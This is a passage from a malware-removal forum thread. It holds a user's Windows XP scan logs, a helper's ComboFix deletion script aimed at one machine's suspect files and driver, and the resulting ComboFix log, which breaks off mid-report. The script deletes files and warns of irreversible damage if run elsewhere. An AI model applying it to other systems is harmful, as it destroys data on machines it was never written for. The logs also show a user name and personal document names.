[2009/07/08 14:38:48 | 00,000,166 | ---- | C] () -- C:\WINDOWS\is-26UPH.lst
[2009/07/08 14:33:29 | 06,047,040 | ---- | C] (Glarysoft Ltd ) -- C:\Documents and Settings\John B\Desktop\gusetupnew.exe
[2009/06/26 14:33:25 | 00,000,886 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2009/06/26 14:33:24 | 00,000,882 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2009/06/25 14:01:43 | 00,005,398 | ---- | C] () -- C:\Documents and Settings\John B\My Documents\kasp.html
[2009/06/24 10:29:16 | 00,001,948 | -HS- | C] () -- C:\Documents and Settings\All Users\Documents\Thumbs.db
[2009/06/24 10:29:11 | 00,000,002 | ---- | C] () -- C:\-1124392173
[2009/06/17 13:49:44 | 00,024,064 | ---- | C] () -- C:\Documents and Settings\John B\My Documents\Nacey alling.doc
[2009/06/16 09:53:10 | 00,000,000 | ---D | C] -- C:\Documents and Settings\John B\My Documents\My Trackstick Files
[2009/06/16 09:49:52 | 00,002,339 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Trackstick Manager.lnk
[2009/06/16 09:49:48 | 00,000,000 | ---D | C] -- C:\Program Files\Trackstick Manager
[2009/06/16 09:47:59 | 06,621,696 | ---- | C] (Microsoft Corporation) -- C:\Documents and Settings\John B\Desktop\TrackstickSetup.EXE
[2009/06/11 10:43:46 | 00,000,000 | ---D | C] -- C:\Documents and Settings\John B\Desktop\GooredFixBackups
[2009/06/11 09:48:35 | 00,101,636 | ---- | C] () -- C:\Documents and Settings\John B\Desktop\SystemLook.exe
[2009/01/14 21:23:11 | 00,065,536 | ---- | C] () -- C:\WINDOWS\System32\HPPLVS.dll
[2008/12/09 00:09:21 | 00,030,208 | ---- | C] () -- C:\WINDOWS\System32\WNASPI32.DLL
[2008/12/09 00:09:21 | 00,000,291 | ---- | C] () -- C:\WINDOWS\msfsetup.ini
[2008/12/09 00:04:55 | 00,003,654 | ---- | C] () -- C:\WINDOWS\System32\drivers\Sonyhcp.dll
[2007/11/06 15:19:28 | 00,053,299 | ---- | C] () -- C:\WINDOWS\System32\pthreadVC.dll
[2007/09/25 23:03:08 | 00,043,520 | ---- | C] () -- C:\WINDOWS\System32\CmdLineExt03.dll
[2007/07/26 13:01:50 | 00,114,688 | ---- | C] () -- C:\WINDOWS\System32\hppatusg01.dll
[2007/06/30 23:57:01 | 00,000,000 | ---- | C] () -- C:\WINDOWS\pestpatrol5.INI
[2007/06/18 00:34:35 | 00,011,776 | ---- | C] () -- C:\WINDOWS\System32\ZPORT4AS.dll
[2007/04/25 00:14:14 | 00,000,052 | ---- | C] () -- C:\WINDOWS\STYLEEASEAPA.INI
[2007/04/10 00:03:22 | 00,532,480 | ---- | C] () -- C:\WINDOWS\System32\CddbPlaylist2Sony.dll
[2007/03/05 13:34:28 | 00,676,224 | ---- | C] () -- C:\WINDOWS\System32\OGACheckControl.DLL
[2007/02/19 03:25:49 | 00,077,824 | R--- | C] () -- C:\WINDOWS\System32\HPZIDS01.dll
[2007/02/11 04:09:33 | 00,000,059 | ---- | C] () -- C:\WINDOWS\LTDLG13N.INI
[2006/12/05 17:21:09 | 00,000,000 | ---- | C] () -- C:\WINDOWS\Tripeaks.INI
[2006/11/02 17:03:38 | 00,002,042 | ---- | C] () -- C:\WINDOWS\tabled32.ini
[2006/10/31 12:06:03 | 00,000,128 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2006/09/11 09:46:53 | 00,165,376 | ---- | C] () -- C:\WINDOWS\System32\drivers\atksgt.sys
[2006/09/11 09:46:52 | 00,018,048 | ---- | C] () -- C:\WINDOWS\System32\drivers\lirsgt.sys
[2005/09/04 22:53:16 | 00,000,022 | ---- | C] () -- C:\WINDOWS\kodakpcd.John B.ini
[2005/08/06 09:32:12 | 00,077,824 | ---- | C] () -- C:\WINDOWS\System32\MouseTrapLib.dll
[2005/06/10 10:57:39 | 00,000,034 | ---- | C] () -- C:\WINDOWS\hpfsched.ini
[2005/06/02 22:37:45 | 00,004,005 | ---- | C] () -- C:\WINDOWS\hpdj3740.ini
[2005/05/28 18:50:53 | 00,005,667 | ---- | C] () -- C:\WINDOWS\cdplayer.ini
[2005/03/01 15:30:20 | 00,000,453 | ---- | C] () -- C:\WINDOWS\bdoscandellang.ini
[2005/02/23 21:17:54 | 00,000,426 | ---- | C] () -- C:\WINDOWS\BRWMARK.INI
[2005/01/16 20:42:25 | 00,000,002 | ---- | C] () -- C:\WINDOWS\msoffice.ini
[2004/12/17 16:34:53 | 00,000,037 | ---- | C] () -- C:\WINDOWS\ipixActivex.ini
[2004/10/06 19:33:37 | 00,112,128 | RH-- | C] () -- C:\WINDOWS\CdaC14BA.DLL
[2004/10/06 19:33:35 | 00,008,864 | ---- | C] () -- C:\WINDOWS\System32\drivers\CDAC15BA.SYS
[2004/07/22 19:26:30 | 00,000,028 | ---- | C] () -- C:\WINDOWS\BTW.ini
[2004/07/22 19:26:22 | 00,000,000 | ---- | C] () -- C:\WINDOWS\autorun.INI
[2004/07/07 20:09:00 | 00,072,704 | ---- | C] () -- C:\WINDOWS\System32\GTRTST32.DLL
[2004/07/07 20:08:10 | 00,000,000 | ---- | C] () -- C:\WINDOWS\arhelper.INI
[2004/07/06 21:24:06 | 00,000,708 | ---- | C] () -- C:\WINDOWS\label.ini
[2004/07/06 21:23:54 | 00,000,052 | ---- | C] () -- C:\WINDOWS\odbcddp.ini
[2004/05/28 21:40:39 | 00,000,067 | ---- | C] () -- C:\WINDOWS\swupdate.INI
[2004/03/03 16:27:08 | 00,666,624 | ---- | C] ( ) -- C:\WINDOWS\System32\drivers\MA111nd5.sys
[2004/01/30 10:37:50 | 00,000,092 | R--- | C] () -- C:\WINDOWS\System32\FTDIUN2K.INI
[2003/11/21 16:49:44 | 00,000,061 | ---- | C] () -- C:\WINDOWS\smscfg.ini
[2003/11/20 20:49:20 | 00,000,908 | ---- | C] () -- C:\WINDOWS\System32\Px.ini
[2003/11/20 20:40:32 | 00,000,021 | ---- | C] () -- C:\WINDOWS\CS_SETUP.ini
[2003/11/20 20:34:03 | 00,000,906 | ---- | C] () -- C:\WINDOWS\QUICKEN.INI
[2003/11/20 20:32:41 | 00,019,607 | ---- | C] () -- C:\WINDOWS\System32\drivers\TOSSMBNT.sys
[2003/11/20 20:12:08 | 00,000,000 | ---- | C] () -- C:\WINDOWS\NDSTray.INI
[2003/11/20 20:06:36 | 00,000,034 | ---- | C] () -- C:\WINDOWS\wwwbatch.ini
[2003/11/20 19:54:31 | 00,128,113 | ---- | C] () -- C:\WINDOWS\System32\csellang.ini
[2003/11/20 19:54:31 | 00,045,056 | ---- | C] () -- C:\WINDOWS\System32\csellang.dll
[2003/11/20 19:54:31 | 00,010,165 | ---- | C] () -- C:\WINDOWS\System32\tosmreg.ini
[2003/11/20 19:54:31 | 00,007,671 | ---- | C] () -- C:\WINDOWS\System32\cseltbl.ini
[2003/11/20 19:53:21 | 00,016,384 | ---- | C] () -- C:\WINDOWS\System32\e100bmsg.dll
[2003/11/20 19:44:16 | 00,363,520 | ---- | C] () -- C:\WINDOWS\System32\psisdecd.dll
[2003/11/20 19:28:40 | 00,006,867 | ---- | C] () -- C:\WINDOWS\System32\drivers\tbiosdrv.sys
[2003/11/20 18:53:50 | 00,001,924 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2003/11/20 18:50:00 | 00,000,780 | ---- | C] () -- C:\WINDOWS\orun32.ini
[2003/11/20 18:42:22 | 00,001,793 | ---- | C] () -- C:\WINDOWS\System32\fxsperf.ini
[2003/11/20 17:12:52 | 00,000,382 | ---- | C] () -- C:\WINDOWS\System32\OEMINFO.INI
[2003/11/20 17:12:23 | 00,000,742 | ---- | C] () -- C:\WINDOWS\win.ini
[2003/11/20 17:12:16 | 00,000,227 | ---- | C] () -- C:\WINDOWS\system.ini
[2002/04/04 15:04:08 | 00,069,632 | ---- | C] () -- C:\WINDOWS\System32\hpodinet.dll
[2001/07/07 04:00:00 | 00,003,399 | ---- | C] () -- C:\WINDOWS\System32\hptcpmon.ini
[1996/04/03 14:33:26 | 00,005,248 | ---- | C] () -- C:\WINDOWS\System32\giveio.sys

========== Files - Modified Within 30 Days ==========

[2009/07/09 10:38:28 | 00,000,886 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2009/07/08 17:08:16 | 00,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
[2009/07/08 15:10:08 | 00,054,156 | -H-- | M] () -- C:\WINDOWS\QTFont.qfn
[2009/07/08 14:39:10 | 00,000,314 | ---- | M] () -- C:\WINDOWS\tasks\GlaryInitialize.job
[2009/07/08 14:38:48 | 00,673,280 | ---- | M] () -- C:\WINDOWS\is-26UPH.exe
[2009/07/08 14:38:48 | 00,010,468 | ---- | M] () -- C:\WINDOWS\is-26UPH.msg
[2009/07/08 14:38:48 | 00,000,675 | ---- | M] () -- C:\Documents and Settings\John B\Desktop\Glary Utilities.lnk
[2009/07/08 14:38:48 | 00,000,166 | ---- | M] () -- C:\WINDOWS\is-26UPH.lst
[2009/07/08 14:38:04 | 00,000,882 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2009/07/08 14:34:17 | 06,047,040 | ---- | M] (Glarysoft Ltd ) -- C:\Documents and Settings\John B\Desktop\gusetupnew.exe
[2009/07/08 13:19:20 | 00,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2009/07/08 13:18:05 | 00,000,062 | -HS- | M] () -- C:\Documents and Settings\NetworkService\Local Settings\desktop.ini
[2009/07/08 13:17:54 | 00,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2009/07/08 13:17:46 | 78,733,7216 | -HS- | M] () -- C:\hiberfil.sys
[2009/07/07 09:15:56 | 00,001,158 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2009/06/25 15:42:46 | 00,002,339 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Trackstick Manager.lnk
[2009/06/25 14:01:43 | 00,005,398 | ---- | M] () -- C:\Documents and Settings\John B\My Documents\kasp.html
[2009/06/24 10:29:19 | 00,001,948 | -HS- | M] () -- C:\Documents and Settings\All Users\Documents\Thumbs.db
[2009/06/24 10:29:18 | 00,000,002 | ---- | M] () -- C:\-1124392173
[2009/06/17 13:49:44 | 00,024,064 | ---- | M] () -- C:\Documents and Settings\John B\My Documents\Nacey alling.doc
[2009/06/17 13:30:25 | 00,024,576 | ---- | M] () -- C:\Documents and Settings\John B\My Documents\alice grant.doc
[2009/06/17 11:27:56 | 00,038,160 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2009/06/17 11:27:44 | 00,019,096 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2009/06/16 09:49:15 | 06,621,696 | ---- | M] (Microsoft Corporation) -- C:\Documents and Settings\John B\Desktop\TrackstickSetup.EXE
[2009/06/11 12:53:18 | 00,247,904 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2009/06/11 12:05:32 | 00,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2009/06/11 09:48:35 | 00,101,636 | ---- | M] () -- C:\Documents and Settings\John B\Desktop\SystemLook.exe
< End of report >


Thank you for getting back with me..
  • 0

Advertisements

#41
Transience
Posted 18 July 2009 - 12:05 PM

Transience

    Unofficial Music Guru

  • Retired Staff
  • 2,448 posts
Hello Aoc sorry for the delay I will be taking Egwene's place for the remainder of the fix he has a lot going on just now.

I see you've run ComboFix before, please delete all copies on your PC at the moment and download a fresh copy from here. Then proceed with these instructions:

1. Run a ComboFix script
  • Copy the entire contents of the code box below to notepad (Start > Programs > Accessories > Notepad).
  • Click on File > Save and name the file CFScript.txt. This name is important and must not be changed.
  • Change the Save as Type to All Files.
  • Save it directly on your desktop.
KillAll::

File::
C:\Documents and Settings\John B\desktop\porthard\workcomputer\docs\Downloads\Programs\Sparkle_dwn.exe
C:\Documents and Settings\John B\DoctorWeb\Quarantine\Abel.exe
C:\Documents and Settings\John B\My Documents\My Completed Downloads\ca_setup.exe
C:\poykfa.exe
C:\WINDOWS\System32\drivers\TOSSMBNT.sys
C:\WINDOWS\is-26UPH.exe
C:\WINDOWS\is-26UPH.msg
C:\WINDOWS\is-26UPH.lst

Folder::
C:\-1124392173

Driver::
TOSSMBNT

Extra::

SysRst::
Note: If you are not the topic starter, DO NOT download or run this script as it could cause irreversible damage to your computer.

Please note that the same procedure applies to running ComboFix this time as before - disable your protection programs beforehand, close all other programs, don't interrupt it for any reason etc.

Posted Image

Once the script is saved, refering to the picture above, drag CFScript.txt into ComboFix.exe. This will cause ComboFix to start again. Allow it to complete running, following any prompts. Once the program has completed the log should appear automatically, if it doesn't it can be found at C:\ComboFix.txt. Please post the contents of that log in your next reply.

Cheers,
Dave
  • 0

#42
Aoc
Posted 20 July 2009 - 09:15 AM

Aoc

    Member

  • Topic Starter
  • Member
  • PipPip
  • 36 posts
Thanks for getting with me, here is the log you asked for.


ComboFix 09-07-19.04 - John B 07/20/2009 9:37.7.1 - NTFSx86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.751.436 [GMT -5:00]
Running from: c:\documents and settings\John B\Desktop\Combo-Fix.exe
Command switches used :: c:\documents and settings\John B\Desktop\CFScript.txt
AV: avast! antivirus 4.8.1335 [VPS 090719-1] *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}
* Created a new restore point

FILE ::
"c:\documents and settings\John B\desktop\porthard\workcomputer\docs\Downloads\Programs\Sparkle_dwn.exe"
"c:\documents and settings\John B\DoctorWeb\Quarantine\Abel.exe"
"c:\documents and settings\John B\My Documents\My Completed Downloads\ca_setup.exe"
"C:\poykfa.exe"
"c:\windows\is-26UPH.exe"
"c:\windows\is-26UPH.lst"
"c:\windows\is-26UPH.msg"
"c:\windows\System32\drivers\TOSSMBNT.sys"
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\-1124392173
c:\documents and settings\John B\desktop\porthard\workcomputer\docs\Downloads\Programs\Sparkle_dwn.exe
c:\documents and settings\John B\Local Settings\Temporary Internet Files\temp.dmf
c:\documents and settings\John B\My Documents\My Completed Downloads\ca_setup.exe
c:\windows\Downloaded Program Files\popcaploader.inf
c:\windows\Installer\26ed31d.msi
c:\windows\Installer\4462d.msi
c:\windows\Installer\596ea64.msi
c:\windows\system32\drivers\TOSSMBNT.sys

c:\windows\system32\proquota.exe was missing
Restored copy from - c:\system volume information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP386\A0066304.exe

.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.

-------\Legacy_TOSSMBNT
-------\Legacy_{79007602-0CDB-4405-9DBF-1257BB3226ED}
-------\Legacy_{79007602-0CDB-4405-9DBF-1257BB3226EE}
-------\Service_tossmbnt


((((((((((((((((((((((((( Files Created from 2009-06-20 to 2009-07-20 )))))))))))))))))))))))))))))))
.

2009-07-20 14:46 . 2008-04-14 00:12 50176 -c--a-w- c:\windows\system32\dllcache\proquota.exe
2009-07-20 14:46 . 2008-04-14 00:12 50176 ----a-w- c:\windows\system32\proquota.exe
2009-06-24 20:59 . 2009-06-24 20:58 410984 ----a-w- c:\windows\system32\deploytk.dll
2009-06-24 20:58 . 2009-06-24 20:58 152576 ----a-w- c:\documents and settings\John B\Application Data\Sun\Java\jre1.6.0_14\lzma.dll

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-07-20 14:49 . 2008-11-17 19:50 -------- d-----w- c:\program files\Glary Utilities
2009-07-14 20:25 . 2005-05-26 03:10 -------- d-----w- c:\program files\Mozilla Thunderbird
2009-06-24 20:58 . 2003-11-21 00:41 -------- d-----w- c:\program files\Java
2009-06-24 14:04 . 2009-01-17 02:19 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2009-06-23 20:55 . 2009-02-27 14:22 3561743 ----a-w- c:\documents and settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\mbam-setup.exe
2009-06-19 20:25 . 2005-05-20 16:26 -------- d-----w- c:\program files\PokerStars
2009-06-17 18:32 . 2007-12-30 17:33 -------- d-----w- c:\program files\SpeedFan
2009-06-17 16:27 . 2009-01-17 02:19 38160 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-06-17 16:27 . 2009-01-17 02:19 19096 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-06-16 14:49 . 2009-06-16 14:49 -------- d-----w- c:\program files\Trackstick Manager
2009-06-16 14:36 . 2003-11-20 22:12 119808 ----a-w- c:\windows\system32\t2embed.dll
2009-06-16 14:36 . 2003-11-20 22:11 81920 ----a-w- c:\windows\system32\fontsub.dll
2009-06-05 15:05 . 2009-06-05 15:05 5178656 ----a-w- c:\documents and settings\John B\Application Data\GARMIN\RMU\RmuSetup.exe
2009-06-05 15:05 . 2009-06-05 15:05 -------- d-----w- c:\documents and settings\John B\Application Data\GARMIN
2009-06-05 14:57 . 2007-11-26 01:25 -------- d-----w- c:\program files\DIFX
2009-06-05 14:57 . 2009-06-05 14:57 -------- d-----w- c:\program files\Garmin
2009-06-04 19:21 . 2006-01-13 03:23 10 ----a-w- c:\windows\popcinfo.dat
2009-06-04 18:57 . 2006-06-17 03:07 -------- d-----w- c:\program files\Railroad Tycoon II
2009-06-03 20:03 . 2007-05-16 02:19 -------- d---a-w- c:\documents and settings\All Users\Application Data\TEMP
2009-06-03 19:56 . 2008-05-22 06:55 -------- d-----w- c:\documents and settings\All Users\Application Data\HipSoft
2009-06-03 19:09 . 2003-05-30 17:00 1291264 ----a-w- c:\windows\system32\quartz.dll
2009-05-26 18:04 . 2008-10-30 05:07 -------- d-----w- c:\program files\Cain
2009-05-19 18:09 . 2009-05-19 18:09 1245321 ----a-w- c:\documents and settings\All Users\Application Data\NeoEdge Networks\Yahoo_Buildalot\IAF.dll
2009-05-07 15:32 . 2003-11-20 22:11 345600 ----a-w- c:\windows\system32\localspl.dll
2009-04-29 04:46 . 2004-02-06 23:05 666624 ----a-w- c:\windows\system32\wininet.dll
2009-04-29 04:46 . 2004-09-09 00:06 81920 ------w- c:\windows\system32\ieencode.dll
2004-12-22 22:58 . 2004-12-29 01:41 18448384 ----a-w- c:\program files\Common Files\TaxWise Workstation Setup.msi
2009-06-16 14:03 . 2009-01-10 20:56 134648 ----a-w- c:\program files\mozilla firefox\components\brwsrcmp.dll
.

((((((((((((((((((((((((((((((((((((((( System Restore )))))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\32788r22fwjfw.0.tmp\n.com
04/20/2009 12:56 PM 31232 \RP386\A0065955.com

c:\32788r22fwjfw.0.tmp\ND_.bat
05/01/2009 02:44 AM 5945 \RP386\A0065956.bat

c:\32788r22fwjfw.0.tmp\NT-OS.cmd
05/17/2009 03:27 AM 11910 \RP386\A0065957.cmd

c:\32788r22fwjfw.0.tmp\OSid.vbs
08/31/2000 08:00 AM 977 \RP386\A0065958.vbs

c:\32788r22fwjfw.0.tmp\pev.exe
05/14/2009 05:50 PM 117248 \RP386\A0065959.exe

c:\32788r22fwjfw.0.tmp\Prep.cmd
05/18/2009 01:20 PM 12353 \RP386\A0065960.cmd

c:\32788r22fwjfw.0.tmp\RegScan.cmd
05/17/2009 03:28 AM 50388 \RP386\A0065962.cmd

c:\32788r22fwjfw.0.tmp\restore_pt.vbs
05/01/2009 10:26 PM 587 \RP386\A0065963.vbs

c:\32788r22fwjfw.0.tmp\RestoreO4.bat
04/24/2009 11:07 PM 1773 \RP386\A0065964.bat

c:\32788r22fwjfw.0.tmp\Rkey.cmd
08/31/2000 08:00 AM 241 \RP386\A0065965.cmd

c:\32788r22fwjfw.0.tmp\SafeBootRepair.bat
05/17/2009 03:28 AM 15359 \RP386\A0065966.bat

c:\32788r22fwjfw.0.tmp\SetEnvmt.bat
05/17/2009 03:28 AM 12650 \RP386\A0065967.bat

c:\32788r22fwjfw.0.tmp\SnapShot.cmd
05/17/2009 03:28 AM 3347 \RP386\A0065968.cmd

c:\32788r22fwjfw.0.tmp\SRestore.cmd
05/17/2009 03:28 AM 2142 \RP386\A0065969.cmd

c:\32788r22fwjfw.0.tmp\SuppScan.cmd
05/17/2009 03:28 AM 17714 \RP386\A0065970.cmd

c:\32788r22fwjfw.0.tmp\SvcDrv.vbs
08/31/2000 08:00 AM 2176 \RP386\A0065971.vbs

c:\32788r22fwjfw.0.tmp\Update-CF.cmd
04/24/2009 11:07 PM 2743 \RP386\A0065973.cmd

c:\32788r22fwjfw.0.tmp\Wmi_rem.vbs
05/14/2009 01:08 AM 592 \RP386\A0065974.vbs

c:\avenger\gsf83iujid.dll
\RP403\A0066778.dll

C:\CFCleanUp.bat
\RP382\A0065673.bat

C:\chfyosn.exe
\RP403\A0066754.exe

05/17/2009 03:28 AM 3286 c:\combo-fix\Assoc.cmd
05/17/2009 03:28 AM 3286 \RP413\A0079041.cmd

c:\combo-fix\Auto-RC.cmd
05/17/2009 03:28 AM 3108 \RP413\A0079042.cmd

07/14/2009 03:16 PM 1239 c:\combo-fix\av.cmd
07/14/2009 03:16 PM 1239 \RP413\A0079043.cmd

05/13/2009 06:09 PM 1464 c:\combo-fix\av.vbs
05/13/2009 06:09 PM 1464 \RP413\A0079044.vbs

c:\combo-fix\AWF.cmd
04/29/2009 04:41 PM 629 \RP413\A0079045.cmd

06/14/2009 02:08 AM 1896 c:\combo-fix\Boot-Rk.cmd
06/14/2009 02:08 AM 1896 \RP413\A0079046.cmd

07/19/2009 07:20 AM 7692 c:\combo-fix\Boot.bat
07/19/2009 07:20 AM 7692 \RP413\A0079047.bat

08/31/2000 08:00 AM 7680 c:\combo-fix\BootSect.dll
08/31/2000 08:00 AM 7680 \RP413\A0079048.dll

c:\combo-fix\c.bat
07/20/2009 09:11 AM 45236 \RP413\A0079049.bat

06/06/2009 08:51 AM 732 c:\combo-fix\Catch-sub.cmd
06/06/2009 08:51 AM 732 \RP413\A0079050.cmd

07/20/2009 09:50 AM 91 c:\combo-fix\CCS.bat
07/20/2009 09:37 AM 91 \RP414\A0079149.bat

c:\combo-fix\CF-Script.cmd
07/15/2009 07:34 AM 25506 \RP413\A0079051.cmd

07/20/2009 09:34 AM 16 c:\combo-fix\CHCP.bat
07/20/2009 09:32 AM 16 \RP413\A0079052.bat

08/31/2000 08:00 AM 1024 \RP413\A0079053.sys

c:\combo-fix\Combobatch.bat
07/20/2009 02:58 AM 7521 \RP413\A0079054.bat

c:\combo-fix\Create.cmd
07/02/2009 05:34 PM 6692 \RP413\A0079055.cmd

07/13/2009 01:13 AM 3412 c:\combo-fix\CregC.cmd
07/13/2009 01:13 AM 3412 \RP413\A0079056.cmd

05/25/2009 10:08 AM 1688 c:\combo-fix\CSet.cmd
05/25/2009 10:08 AM 1688 \RP413\A0079057.cmd

07/08/2009 07:32 PM 1406 c:\combo-fix\DelClsid.bat
07/08/2009 07:32 PM 1406 \RP413\A0079058.bat

07/16/2009 10:08 AM 13502 c:\combo-fix\Exe.reg
07/16/2009 10:08 AM 13502 \RP413\A0079059.reg

c:\combo-fix\FD-SV.cmd
07/19/2009 11:29 AM 2162 \RP413\A0079060.cmd

08/31/2000 08:00 AM 36201 c:\combo-fix\ffdefstr.dll
08/31/2000 08:00 AM 36201 \RP413\A0079061.dll

07/20/2009 09:21 AM 2202 c:\combo-fix\files.pif
07/20/2009 09:21 AM 2202 \RP413\A0079062.pif

07/20/2009 02:58 AM 28011 c:\combo-fix\FIND3M.bat
07/20/2009 02:58 AM 28011 \RP413\A0079063.bat

07/20/2009 09:21 AM 4668 c:\combo-fix\FIXLSP.bat
07/20/2009 09:21 AM 4668 \RP413\A0079064.bat

05/25/2009 10:05 AM 1095 c:\combo-fix\FKMGen.cmd
05/25/2009 10:05 AM 1095 \RP413\A0079065.cmd

02/15/2001 03:03 PM 10240 c:\combo-fix\ForceLibrary.dll
02/15/2001 03:03 PM 10240 \RP413\A0079066.dll

06/23/2009 03:20 PM 5396 c:\combo-fix\GetHive.cmd
06/23/2009 03:20 PM 5396 \RP413\A0079067.cmd

08/16/2005 01:54 AM 1536 c:\combo-fix\hidec.exe
08/16/2005 01:54 AM 1536 \RP413\A0079068.exe

05/01/2009 03:08 AM 915 c:\combo-fix\history.bat
05/01/2009 03:08 AM 915 \RP413\A0079069.bat

c:\combo-fix\Install-RC.cmd
07/13/2009 07:31 AM 5651 \RP413\A0079070.cmd

08/31/2000 08:00 AM 754 c:\combo-fix\katch.cmd
08/31/2000 08:00 AM 754 \RP413\A0079071.cmd

c:\combo-fix\Kill-All.cmd
07/13/2009 07:31 AM 1588 \RP413\A0079072.cmd

05/26/2009 11:27 PM 3434 c:\combo-fix\Kollect.bat
05/26/2009 11:27 PM 3434 \RP413\A0079073.bat

07/20/2009 09:46 AM 192699 c:\combo-fix\Lang.bat
07/20/2009 07:41 AM 192441 \RP413\A0079074.bat

c:\combo-fix\List-B.bat
07/20/2009 09:11 AM 35049 \RP413\A0079075.bat

c:\combo-fix\List-C.bat
07/20/2009 03:02 AM 218579 \RP413\A0079076.bat

c:\combo-fix\List-D.bat
07/10/2009 04:58 AM 92326 \RP413\A0079077.bat

c:\combo-fix\List.bat
07/20/2009 07:33 AM 595954 \RP413\A0079078.bat

08/31/2000 08:00 AM 2428 c:\combo-fix\lnkread.vbs
08/31/2000 08:00 AM 2428 \RP413\A0079079.vbs

07/20/2009 09:36 AM 5032 c:\combo-fix\md5sum.pif
07/20/2009 09:21 AM 4760 \RP413\A0079080.pif

07/13/2009 12:50 AM 2359 c:\combo-fix\MoveIt.bat
07/13/2009 12:50 AM 2359 \RP413\A0079081.bat

04/20/2009 12:56 PM 31232 c:\combo-fix\n.pif
04/20/2009 12:56 PM 31232 \RP413\A0079082.pif

07/19/2009 07:55 AM 14751 c:\combo-fix\ND_.bat
07/19/2009 07:55 AM 14751 \RP413\A0079083.bat

04/20/2009 12:56 PM 31232 c:\combo-fix\NircmdB.exe
04/20/2009 12:56 PM 31232 \RP413\A0079084.exe

07/16/2009 03:14 AM 14737 c:\combo-fix\NT-OS.cmd
07/16/2009 03:14 AM 14737 \RP413\A0079085.cmd

08/31/2000 08:00 AM 977 c:\combo-fix\OSid.vbs
08/31/2000 08:00 AM 977 \RP413\A0079086.vbs

07/13/2009 05:48 AM 219648 c:\combo-fix\pev.exe
07/13/2009 05:48 AM 219648 \RP413\A0079087.exe

07/13/2009 07:31 AM 61738 c:\combo-fix\RegScan.cmd
07/13/2009 07:31 AM 61738 \RP413\A0079089.cmd

c:\combo-fix\restore_pt.vbs
05/01/2009 10:26 PM 587 \RP413\A0079090.vbs

08/31/2000 08:00 AM 241 c:\combo-fix\Rkey.cmd
08/31/2000 08:00 AM 241 \RP413\A0079091.cmd

06/27/2009 01:46 AM 12571 c:\combo-fix\SetEnvmt.bat
06/27/2009 01:46 AM 12571 \RP413\A0079092.bat

07/20/2009 09:34 AM 69 c:\combo-fix\sfx.cmd
07/20/2009 09:32 AM 14 \RP413\A0079093.cmd

c:\combo-fix\SnapShot.cmd
06/29/2009 08:35 PM 3344 \RP413\A0079094.cmd

07/13/2009 07:31 AM 2127 c:\combo-fix\SRestore.cmd
07/13/2009 07:31 AM 2127 \RP413\A0079095.cmd

06/30/2009 01:24 AM 18788 c:\combo-fix\SuppScan.cmd
06/30/2009 01:24 AM 18788 \RP413\A0079096.cmd

08/31/2000 08:00 AM 2176 c:\combo-fix\SvcDrv.vbs
08/31/2000 08:00 AM 2176 \RP413\A0079097.vbs

c:\combo-fix\Update-CF.cmd
07/13/2009 07:31 AM 2734 \RP413\A0079099.cmd
07/13/2009 07:31 AM 2734 \RP413\A0079103.cmd

c:\combo-fix\w_sock.dll
06/21/2009 02:45 PM 98948 \RP413\A0079102.dll

c:\combo-fix\w2k_sock.dll
06/21/2009 03:34 PM 90202 \RP413\A0079100.dll
06/21/2009 03:34 PM 90202 \RP413\A0079104.dll

05/14/2009 01:08 AM 592 c:\combo-fix\Wmi_rem.vbs
05/14/2009 01:08 AM 592 \RP413\A0079101.vbs

06/23/2009 03:55 PM 3561743 c:\documents and settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\mbam-setup.exe
05/01/2009 02:18 PM 2967799 \RP402\A0066733.exe

05/08/2007 08:03 PM 34308 c:\documents and settings\John B\Application Data\Macromedia\Shockwave Player\xtras\download\AndradeArts\Music\BASSMOD.dll
05/08/2007 08:03 PM 34308 \RP376\A0063153.dll
05/08/2007 08:03 PM 34308 \RP405\A0066823.dll

c:\documents and settings\John B\Application Data\pidle\pidle.exe
\RP376\A0063111.exe

c:\documents and settings\John B\igLoader Files\MasterKickMiniClip\igUninst.exe
05/06/2006 08:44 AM 18432 \RP381\A0065633.exe

c:\documents and settings\John B\igLoader Files\MasterKickMiniClip\MasterKickMiniClip.dll
05/26/2006 11:07 PM 3457024 \RP381\A0065627.dll

04/13/2008 07:12 PM 26624 c:\documents and settings\LocalService\Application Data\Microsoft\UPnP Device Host\upnphost\udhisapi.dll
04/13/2008 07:12 PM 26624 \RP372\A0062954.dll
\RP406\A006
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
